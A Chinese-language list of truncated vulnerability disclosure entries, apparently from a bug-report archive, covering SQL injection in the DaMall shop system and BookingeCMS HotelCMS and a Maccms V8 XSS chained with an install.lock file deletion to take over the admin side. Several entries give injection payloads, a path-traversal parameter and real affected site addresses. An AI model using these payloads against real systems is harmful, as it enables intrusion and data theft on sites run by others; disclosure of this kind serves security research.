DaMall商城系统httphandler/getdata.ashx SQL注入漏洞

0x01 框架介绍 商城网站建设-damall多功能商城建站系统,支持B2C2C,O2O模式...DaMall商城建站系统采用强劲的.NET企业级平台研发,可兼容多行业、多模式的业务特点以及扩展需求。 官方主页：http://www.bg68.com 0x02 漏洞细节 漏洞页面： http://mall.bg68.com/httphandler/getdata.ashx 参数brandid 部分用户案例： http://mall.hicay.com/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ash...

BookingeCMS HotelCMS酒店预订管理系统rewrite参数SQL注入

0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=info&rewrite=1 文件rewrite参数存在注入 0x02 漏洞利用 测试Payload: （get提交） ?m=info&rewrite=1' UNION ALL SELECT CONCAT0x7c,IFNULLCASTCURRENTUSER AS CHAR,0x20,0x7c,NULL%23 0x03 参考链接...

BookingeCMS HotelCMS酒店预订管理系统cityName参数存在注入

0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.setSearchSession 文件cityName参数存在注入 0x02 漏洞利用 测试Payload: （post提交） /?m=hotel.setSearchSession cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND SELECT 4965 FROMSELECT...

Maccms V8 XSS可打后台 #3

简要描述： 刚发了个后台getshell，但是屌丝的攻城狮要怎么进入后台呢？XSS呀 本应该两个洞一起发的，xss+后台getshell=getshell，手快发早了，只好再找个其它的接口来充数了 详细说明： 在留言板本处 插入即可 打后台 漏洞证明： 结合后台漏洞攻击： 1. 后台任意文件删除，可删除install.lock导致重装 接口 http://localhost/maccms8/admin/?m=extend-picdel post参数： fname%5B%5D=..%2Fupload%2Fart%2F..%5C%5C..%5C%5C\inc\install.lock 2...